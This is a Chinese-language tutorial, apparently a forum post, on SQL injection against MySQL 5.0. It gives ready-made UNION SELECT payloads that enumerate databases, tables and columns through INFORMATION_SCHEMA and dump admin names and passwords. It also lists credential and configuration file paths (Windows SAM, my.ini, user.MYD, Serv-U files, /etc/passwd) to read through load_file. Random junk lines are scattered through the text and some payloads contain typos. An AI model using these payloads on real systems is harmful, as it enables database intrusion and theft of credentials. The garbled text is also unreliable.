mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。
  a% c* d5 @7 z& m7 q

+ z: y) z8 `6 M# Q1 w  z; W) i
$ y! i* E: y2 X1 t& X. I4 JMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
% E1 F& G' O0 g) Y9 ]# b存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
明。
+ j$ `9 Z1 f4 F7 E1.得到所有数据库名：
- v3 P; Y5 B' g4 g; w|SCHEMATA ->存储数据库名的表
0 _* p7 |, g0 U& S5 X1 e|—字段：SCHEMA_NAME ->数据库名称
! N4 b% v6 U1 Q1 k# {
|TABLES ->存储表名
+ m, o" v3 \  W+ K+ a|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|—字段：TABLE_NAME ->存储表的表名
/ Q# G# R; C0 E. K0 j$ C8 u
& U+ s+ Q$ W; d0 ~. \|COLUMNS ->存储的字段名表
& O) I0 t, ]0 O) J|—字段：TABLE_SCHEMA ->该字段所属数据库名
|—字段：TABLE_NAME ->存储所属表的名称
: ^5 H0 i( f  Q: ]
/ V8 S3 Z- \1 K6 u0 Z|—字段：COLUMN_NAME ->该字段的名称

$ s! x6 b, O* h: [8 C+ |#########################################################################
##

0×001 获取系统信息:
- F* ^, U/ Z  l: s: i
# h/ L& e& u1 y( junion select 1,2,3,4,5,concat
(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
# o# i  k9 ]3 t/ ?% ?(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*

9 S6 T9 W0 t$ ^' ^/*
; K9 d, I$ `, O0 d+ U6 T9 c
$ |3 U4 I0 @- ~9 {8 `; I@@global.version_compile_os 获取系统版本

@@datadir 数据库路径
7 }9 I, a. P! Fdatabase() 当前数据库名称
0x3c62723e 换行HEX值
7 v0 t" F+ ~! X3 Y1 A6 l
*/

- n1 f8 }4 z2 P3 {- }6 }* R; ^######################################################################

8 W+ W3 H; S* d9 |3 c( Z0×002 获取表名

union select 1,2,group_concat(table_name),4,5,6,7,8,9 from
information_schema.tables where table_schema=0x67617264656e /*
  p7 E6 j4 @' Y' n; `' S
- x- `* G( q; b% a; f/*

0x67617264656e 为当前数据库名
" [" \$ s1 w  C' ?# _% A. _6 L
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
: q8 J3 P2 _5 ~8 o6 g9 K. k
, x& i1 [8 a0 R4 k*/
# @- G$ u& b& t  M7 i
0 k1 D. K2 f! r: @) p/ ?: w######################################################################

4 T4 T$ h# U, h% q4 \: S0×003 获取字段
9 {6 j4 `& _4 k' ~" b+ H7 P
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
information_schema.columns where table_name=0x61646d696e and

# p8 V5 O# j% B0 m* \+ g  U. M
+ h4 p; c+ o) atable_schema=0x67617264656e limit 1 /*
9 U; J/ P1 i& k7 b
4 G- P& d/ V  p/*

; t2 B5 |1 g: q# D" t. i' Ngroup_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段
) X2 j" Y' T: j2 U* m6 q$ v
0x61646d696e ->选择一个表
- ?6 x- T$ x& _% p; t' w; L
# {; S& W2 }, J- {! j+ E0x67617264656e ->数据库名
! C0 u0 U( [/ r, F
! W4 S* u- F. M- A*/

#####################################################################

8 U. m8 u& h: O3 s8 d1 c; _4 _& T0×004 获取数据
# q8 |/ v( l+ m! r
union select 1,2,3
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin

union select 1,group_concat(id),group_concat(adname),4,5,group_concat
(adpassword),6,7,8 from admin
8 s* N( A* X- Y+ n, b: c4 F0 u$ p
" t8 x; L- f% Z- E3 C) A- _/*
) C7 @1 r" R8 U8 b2 j4 c0 A$ y- j
" B* `7 ^' Z6 L0x3c62723e 换行符号HEX编码

group_concat 同时获得该字段所有数据
8 {, G" p9 h# k# Z4 ^
8 G) J# G; O; F3 V; G' p2 `*/

! K# `' q( ?. W5 h, V* e' [
' Q! |/ M$ z5 P8 v! y
0 v  Z7 U# }% s1 M' y$ _! ^" e3 V* p

' F5 D6 _9 d3 y  D% y  x顺便添加一些mysql注入时非常有用的一些东西

! R# X6 ]) D) v- J( U3 n简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。
  Y' ^- ^4 H% m* J2 L! H+ U- X8 m6 ?4 _
# H3 Y' s7 V  O/ n* E1:system_user() 系统用户名
; f, z) q$ N: e3 R+ ]' }* y3 _2:user()        用户名
3:current_user()  当前用户名
4:session_user()连接数据库的用户名
5:database()    数据库名
6 C7 R/ X& i& M9 f/ n6:version()     MYSQL数据库版本
1 K) }: K  b* f7:load_file()   MYSQL读取本地文件的函数
5 {  `( N. I# O' E9 u4 ^7 ?8@datadir     读取数据库路径
9@basedir    MYSQL 安装路径
! H% S! A+ T! _" E4 w10@version_compile_os   操作系统  Windows Server 2003,
收集的一些路径：
- L' j  \( w1 c8 |* X" NWINDOWS下:
8 t  x! F* j. C: }3 D' c( e3 cc:/boot.ini          //查看系统版本
  w$ _1 Z0 O" ac:/windows/php.ini   //php配置信息
" ^( a, Z: k1 m4 l: N5 V! Xc:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
1 Q7 I" k; S7 b6 w0 ?$ Nc:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
0 Q4 a2 p$ t# p- |# yc:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
6 V- A+ E/ D- K; \c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
% U' m2 `: t) A/ @/ l( L# b; Cc:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
7 A; v, V9 ?& g4 H, ?c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
* E, U$ e1 t* b% oc:\Program Files\RhinoSoft.com\ServUDaemon.exe
+ }% O9 ?1 S/ g9 h2 i  [8 fC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
" r& j  X) Q& \2 [

c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
( _7 b) e- B3 H7 G/ @d:\APACHE\Apache2\conf\httpd.conf
' e3 x/ M$ f' E* v+ ]! SC:\Program Files\mysql\my.ini
) Q# j( z+ E* A1 x& [4 b2 Cc:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
4 q) e+ w4 K: s, O6 P* u0 i& j
LUNIX/UNIX下:
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
3 b' a. E7 t* O+ D2 f* J" A- u" G# G/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
! W0 y: U1 k* J/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
+ g7 ~( R& b- b  b- g/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
5 K: W* T& E, {# D, {/etc/issue
2 e& y9 K1 D/ Z( @2 @; }/etc/issue.net
/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
7 O) N1 Z" e" q* |) J, k/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
) e  _1 `% A$ l# }8 ^/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
6 J" |# s* s' N  }: X. J/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
7 H/ G: i$ d0 O5 H) c: h/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略
load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
$ C& n- g+ S6 z5 K5 Rreplace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
+ @4 f# m- K4 {1 m: w
8 ^# s# G/ y2 m6 R